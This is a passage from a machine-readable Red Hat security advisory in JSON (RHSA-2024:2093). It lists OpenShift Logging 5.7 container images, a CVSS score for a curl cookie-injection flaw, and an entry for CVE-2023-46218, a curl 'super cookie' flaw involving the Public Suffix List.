"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "curl: cookie injection with none file"
},
{
"acknowledgments": [
{
"names": [
"Harry Sintonen"
],
"organization": "reported"
},
{
"names": [
"Daniel Stenberg"
],
"organization": "patched"
}
],
"cve": "CVE-2023-46218",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"discovery_date": "2023-11-29T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2252030"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in curl that verifies a given cookie domain against the Public Suffix List. This issue could allow a malicious HTTP server to set \"super cookies\" in curl that are passed back to more origins than what is otherwise allowed or possible.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "curl: information disclosure by exploiting a mixed case flaw",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "When curl is built without PSL support, it cannot protect against this problem but it is expected to not allow \"too wide\" cookies when PSL support is enabled.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
